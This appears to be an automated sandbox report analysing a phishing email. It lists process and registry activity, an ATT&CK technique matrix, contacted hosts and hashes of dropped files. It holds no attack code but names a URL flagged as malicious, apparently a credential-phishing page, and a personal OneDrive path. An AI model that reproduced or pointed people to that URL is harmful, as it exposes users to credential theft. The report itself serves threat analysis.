        Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
        Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
        Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
        Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
        Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
        Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
        Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
        Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
        Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformation
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
        Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
        Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
        DLL Side-Loading
        1
        Process Injection
        3
        Masquerading
        OS Credential Dumping1
        Process Discovery
        Remote ServicesData from Local System2
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        Registry Run Keys / Startup Folder
        1
        DLL Side-Loading
        1
        Process Injection
        LSASS Memory1
        File and Directory Discovery
        Remote Desktop ProtocolData from Removable Media1
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Registry Run Keys / Startup Folder
        1
        DLL Side-Loading
        Security Account Manager14
        System Information Discovery
        SMB/Windows Admin SharesData from Network Shared Drive2
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        autopaysystems-processor.com1%VirustotalBrowse
        eastus1-mediap.svc.ms0%VirustotalBrowse
        dual-spo-0005.spo-msedge.net0%VirustotalBrowse
        part-0013.t-0009.t-msedge.net0%VirustotalBrowse
        No Antivirus matches
        NameIPActiveMaliciousAntivirus DetectionReputation
        dual-spo-0005.spo-msedge.net
        13.107.138.10
        truefalseunknown
        pub-f2f0bb32ee854056bd3509f477f0b9bd.r2.dev
        104.18.3.35
        truefalse
          unknown
          part-0013.t-0009.t-msedge.net
          13.107.213.41
          truefalseunknown
          a.nel.cloudflare.com
          35.190.80.1
          truefalse
            high
            code.jquery.com
            151.101.130.137
            truefalse
              high
              cdnjs.cloudflare.com
              104.17.24.14
              truefalse
                high
                challenges.cloudflare.com
                104.17.3.184
                truefalse
                  high
                  www.google.com
                  64.233.177.104
                  truefalse
                    high
                    autopaysystems-processor.com
                    104.21.8.199
                    truefalseunknown
                    lakesidelumbar.com
                    190.211.254.196
                    truefalse
                      unknown
                      eastus1-mediap.svc.ms
                      unknown
                      unknownfalseunknown
                      m365cdn.nel.measure.office.net
                      unknown
                      unknownfalse
                        high
                        spo.nel.measure.office.net
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://autopaysystems-processor.com/auth.htmltrue
                            unknown
                            https://netorgft3648903-my.sharepoint.com/personal/samantha_ever-eden_com/_layouts/15/onedrive.aspx?id=%2Fpersonal%2Fsamantha%5Fever%2Deden%5Fcom%2FDocuments%2FDocuments%2FOffice%20Scripts%2Fdoc%2DHR%2Epng&parent=%2Fpersonal%2Fsamantha%5Fever%2Deden%5Fcom%2FDocuments%2FDocuments%2FOffice%20Scripts&ga=1false
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              13.107.138.10
                              dual-spo-0005.spo-msedge.netUnited States
                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                              52.168.117.174
                              unknownUnited States
                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                              23.76.37.146
                              unknownUnited States
                              19037AMXArgentinaSAARfalse
                              13.107.136.10
                              unknownUnited States
                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                              104.18.3.35
                              pub-f2f0bb32ee854056bd3509f477f0b9bd.r2.devUnited States
                              13335CLOUDFLARENETUSfalse
                              23.59.235.213
                              unknownUnited States
                              16625AKAMAI-ASUSfalse
                              52.109.16.52
                              unknownUnited States
                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                              23.223.31.35
                              unknownUnited States
                              16625AKAMAI-ASUSfalse
                              23.46.201.17
                              unknownUnited States
                              16625AKAMAI-ASUSfalse
                              20.189.173.6
                              unknownUnited States
                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                              23.223.31.12
                              unknownUnited States
                              16625AKAMAI-ASUSfalse
                              104.21.8.199
                              autopaysystems-processor.comUnited States
                              13335CLOUDFLARENETUSfalse
                              20.42.65.88
                              unknownUnited States
                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                              173.194.219.94
                              unknownUnited States
                              15169GOOGLEUSfalse
                              104.17.3.184
                              challenges.cloudflare.comUnited States
                              13335CLOUDFLARENETUSfalse
                              151.101.130.137
                              code.jquery.comUnited States
                              54113FASTLYUSfalse
                              23.209.37.82
                              unknownUnited States
                              20940AKAMAI-ASN1EUfalse
                              162.159.61.3
                              unknownUnited States
                              13335CLOUDFLARENETUSfalse
                              13.107.213.41
                              part-0013.t-0009.t-msedge.netUnited States
                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                              74.125.136.101
                              unknownUnited States
                              15169GOOGLEUSfalse
                              35.190.80.1
                              a.nel.cloudflare.comUnited States
                              15169GOOGLEUSfalse
                              107.22.247.231
                              unknownUnited States
                              14618AMAZON-AESUSfalse
                              52.113.194.132
                              unknownUnited States
                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                              104.17.24.14
                              cdnjs.cloudflare.comUnited States
                              13335CLOUDFLARENETUSfalse
                              23.6.117.27
                              unknownUnited States
                              20940AKAMAI-ASN1EUfalse
                              23.50.120.17
                              unknownUnited States
                              16625AKAMAI-ASUSfalse
                              51.104.15.253
                              unknownUnited Kingdom
                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                              172.253.124.138
                              unknownUnited States
                              15169GOOGLEUSfalse
                              190.211.254.196
                              lakesidelumbar.comPanama
                              51852PLI-ASCHfalse
                              172.253.124.94
                              unknownUnited States
                              15169GOOGLEUSfalse
                              23.47.176.131
                              unknownUnited States
                              16625AKAMAI-ASUSfalse
                              64.233.177.104
                              www.google.comUnited States
                              15169GOOGLEUSfalse
                              239.255.255.250
                              unknownReserved
                              unknownunknownfalse
                              51.105.71.136
                              unknownUnited Kingdom
                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                              142.251.15.84
                              unknownUnited States
                              15169GOOGLEUSfalse
                              23.6.117.10
                              unknownUnited States
                              20940AKAMAI-ASN1EUfalse
                              IP
                              192.168.2.16
                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1431653
                              Start date and time:2024-04-25 15:15:21 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:defaultwindowsinteractivecookbook.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:24
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • EGA enabled
                              Analysis Mode:stream
                              Analysis stop reason:Timeout
                              Sample name:[EXTERNAL] New file received.eml
                              Detection:MAL
                              Classification:mal60.phis.winEML@42/496@30/216
                              Cookbook Comments:
                              • Found application associated with file extension: .eml
                              • Exclude process from analysis (whitelisted): dllhost.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 52.113.194.132
                              • Excluded domains from analysis (whitelisted): ecs.office.com, fs.microsoft.com, s-0005.s-msedge.net, ecs.office.trafficmanager.net, s-0005-office.config.skype.com, ecs-office.s-0005.s-msedge.net
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtSetValueKey calls found.
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):290
                              Entropy (8bit):5.1795871012028165
                              Encrypted:false
                              SSDEEP:
                              MD5:4D361C3DCD2E874A12892C02965F36DD
                              SHA1:F3CB7A1EF66EC1BC6DFF238DFE9D5B795FAB9DA0
                              SHA-256:777341AF75FDA47253EA6E0E95BA39A9C527473C6C9FBBDE422373B924E6A4FE
                              SHA-512:D2A5738A2FEB08B4DF56DAAC0868DC6C3933C2530FBAECE2D1C3B5EBB007FBD08D3FC43A0040D12A1EC63EA25CE88E81907300C946675A529656FB1899750A35
                              Malicious:false
                              Reputation:unknown
                              Preview:2024/04/25-15:16:02.303 1b70 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/04/25-15:16:02.304 1b70 Recovering log #3.2024/04/25-15:16:02.304 1b70 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):331
                              Entropy (8bit):5.13360671923387
                              Encrypted:false
                              SSDEEP:
                              MD5:636F766F28EB6173C6D53BDEE0ADC48C
                              SHA1:5FA0D075AC84AE54668F8A504854CD68CC19F2A4
                              SHA-256:4E299C124B570D2375A7CA178215A102079AF98543098F5A1A6B4B4146F80CAF
                              SHA-512:6C2F6BA72435099713A6890CD64981E996545E20507E8059939302977B21FDFF5D5857B762C15A86F030B30698081416E821D0382F6AAB2BF7BF8050AFC50C20
                              Malicious:false
                              Reputation:unknown
                              Preview:2024/04/25-15:16:02.211 b44 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/04/25-15:16:02.215 b44 Recovering log #3.2024/04/25-15:16:02.215 b44 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):403
                              Entropy (8bit):4.953858338552356
                              Encrypted:false
                              SSDEEP:
                              MD5:4C313FE514B5F4E7E89329630909F8DC
                              SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                              SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                              SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                              Malicious:false
                              Reputation:unknown
                              Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):0
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:
                              MD5:4C313FE514B5F4E7E89329630909F8DC
                              SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                              SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                              SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                              Malicious:false
                              Reputation:unknown
                              Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):0
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:
                              MD5:4C313FE514B5F4E7E89329630909F8DC
                              SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                              SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                              SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                              Malicious:false
                              Reputation:unknown
                              Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):403
                              Entropy (8bit):4.976960184865277
                              Encrypted:false
                              SSDEEP:
                              MD5:CB2D8F31957F41800E2FF19F45AF1664
                              SHA1:CEFD568D2065C657F8EB3433FEB0AE0A1D9BBFFD
                              SHA-256:F3972DACA2C870B68387B675E63057382D7E539694172D480AA1A5302EB1896C
                              SHA-512:A0CF0B67D5BCA9FE0C48EA9F629DFE6A2690007A23CE829ECC41FCFB9EAC8ABEFC097D81E5A22FC84A2437704C70BACDA44F9B9B0A8AC7901308358AB4F2595D
                              Malicious:false
                              Reputation:unknown
                              Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13358610973685931","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":111419},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4099
                              Entropy (8bit):5.226878055794388
                              Encrypted:false
                              SSDEEP:
                              MD5:84819D5C6E2873F20672F2526ED919E6
                              SHA1:89221A6D4B863A9CA70F6B7EA1310626446C7D5B
                              SHA-256:25409BC0E505D7848CD298BD7EA01FAFAF10C1BB26EADE32939F550E290C62F1
                              SHA-512:188EC828C16F1EC6D0B5265784AA77E6646C92D0F856684BE2F6068CBAF304303C339E8AD8ED5682DA1982DD1BA9702C228611AC2A9018297C0527DBAEDDB9BA
                              Malicious:false
                              Reputation:unknown
